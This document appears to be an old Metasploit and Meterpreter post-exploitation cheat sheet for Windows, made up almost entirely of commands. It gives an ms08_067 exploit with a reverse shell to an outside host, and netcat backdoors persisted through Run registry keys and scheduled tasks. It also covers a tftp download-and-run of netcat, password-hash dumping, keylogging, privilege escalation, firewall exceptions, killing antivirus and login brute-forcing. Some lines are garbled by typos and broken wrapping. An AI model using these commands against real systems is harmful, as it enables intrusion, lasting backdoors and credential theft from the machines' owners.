!!!METASPLOIT!!!
!!!METASPLOIT!!!
!!!METASPLOIT!!!
interact 1
c:\winnt\system32\>dir
10.Uploading A Backdoor Metasploit Netcat
meterpreter> upload netcat.exe c:\\WINDOWS\\SYSTEM32\\
meterpreter> reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\
Run
meterpreter> reg setval -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\R
un -v windows live -d "c:\\WINDOWS\\SYSTEM32\\netcat.exe -L -d -p 5555 -e cmd.ex
e
meterpreter> reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\
Run
meterpreter> reboot
bt~# nc 192.168.1.1 5555
11. BackTrack 4 R1 Metasploit 3 & SET, Hacking Windows 7
cd /pentest/exploits/SET
./set
Enter you choice: 4
enter the ip addres : 192.168.1.1
enter chose ( hit enter for default): 2
enter chose ( hit enter for default):16
set port 4444
open Konqueror /pentest/exploits/SET/
media/sda3---------->msf.exe
cd /pentest/exploits/SET# cd ..
/pentest/exploits# cd framework3
./msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168..
set lport 4444
exploit
use priv
help
excecute -f cmd
ipconfig
shell
screenhot
excecute -f explorer
12. ms067 + netcat backdoor
use windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOST
set LHOST
exploit
upload /root/nc.exe c:\\WINDOWS\\SYSTEM32\\
MORE Advanced Phun:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST rmccurdy.com
set LPORT 21
set ExitOnSession false
# set AutoRunScript pathto script you want to autorun after exploit is run
________________________________________________________________________
# session hijack tokens
use incognito
impersonate_token "NT AUTHORITY\\SYSTEM"
________________________________________________________________________
# escalate to system
use priv
getsystem
________________________________________________________________________
execute -f cmd.exe -H -c -i -t
execute -f cmd.exe -i -t
________________________________________________________________________
# list top used apps
run prefetchtool -x 20
________________________________________________________________________
# list installed apps
run prefetchtool -p
________________________________________________________________________
run get_local_subnets
________________________________________________________________________
# find and download files
run search_dwld "%USERPROFILE%\\my documents" passwd
run search_dwld "%USERPROFILE%\\desktop passwd
run search_dwld "%USERPROFILE%\\my documents" office
run search_dwld "%USERPROFILE%\\desktop" office
________________________________________________________________________
# alternate
download -r "%USERPROFILE%\\desktop" ~/
download -r "%USERPROFILE%\\my documents" ~/
________________________________________________________________________
# alternate to shell not SYSTEM
# execute -f cmd.exe -H -c -i -t
________________________________________________________________________
# does some run wmic commands etc
run winenum
________________________________________________________________________
# rev shell the hard way
run scheduleme -m 1 -u /tmp/nc.exe -o "-e cmd.exe -L -p 8080"
________________________________________________________________________
# An example of a run of the file to download via tftp of Netcat and then runnin
g it as a backdoor.
run schtasksabuse-dev -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p
8080 -e cmd.exe" -d 4
run schtasksabuse -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 808
0 -e cmd.exe" -d 4
________________________________________________________________________
# vnc / port fwd for linux
run vnc
________________________________________________________________________
# priv esc
run kitrap0d
________________________________________________________________________
run getgui
________________________________________________________________________
# somewhat broken .. google sdt cleaner NtTerminateProcess !@?!?!
run killav
run winemun
run memdump
run screen_unlock
_________________________________________________________________________
upload /tmp/system32.exe C:\\windows\\system32\\
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion \\run
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion \\run -v system
32 -d "C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe"
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion \\Run -v syst
em32
reg enumkey -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\
firewallpolicy\\Standardprofile\\aut horizedapplications\\list
reg setval -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\f
irewallpolicy\\Standardprofile\\aut horizedapplications\\list -v sys
reg queryval -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\
\firewallpolicy\\Standardprofile\\aut horizedapplications\\list -v system32
upload /neo/wallpaper1.bmp "C:\\documents and settings\\pentest3\\local settings
\\application data\\microsoft\\"
__________________________________________________________________________
getuid
ps
getpid
keyscan_start
keyscan_dump
migrate 520
portfwd add -L 104.4.4 -l 6666 -r 192.168.1.1 -p 80"
portfwd add -L 192.168.1.1 -l -r 10.5.5.5 -p 6666
___________________________________________________________________________
shell
run myremotefileserver_mserver -h
run myremotefileserver_mserver -p 8787
___________________________________________________________________________
run msf_bind
run msf_bind -p 1975
rev2self
getuid
___________________________________________________________________________
getuid
enumdesktops
grabdesktop
run deploymsf -f framework-3.3-dev.exe
run
run
run
run
run
run
run
run
run
hashdump
metsvc
scraper
checkvm
keylogrecorder
netenum -fl -hl localhostlist.txt -d google.com
netenum -rl -r 10.192.0.50-10.192.0.254
netenum -st -d google.com
netenum -ps -r 10.192.0.50-254
________________________________________________________________________
# Windows Login Brute Force Meterpreter Script
run winbf -h
________________________________________________________________________
# upload a script or executable and run it
uploadexec
________________________________________________________________________
# Using Payload As A Backdoor from a shell
REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run /v fire
wall /t REG_SZ /d "c:\windows\system32\metabkdr.exe" /f
at 19:00 /every:M,T,W,Th,F cmd /c start "%USERPROFILE%\metabkdr.exe"
SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%\
metabkdr.exe" /ED 11/11/2011
_________________________________________________________________________
# kill AV this will not unload it from mem it needs reboot or kill from memory s
till ... Darkspy, Seem, Icesword GUI can kill the tasks
catchme.exe -K "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -E "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -O "c:\Program Files\Kaspersky\avp.exe" dummy
__________________________________________________________________________
email me@ pris@tyrellcorp.net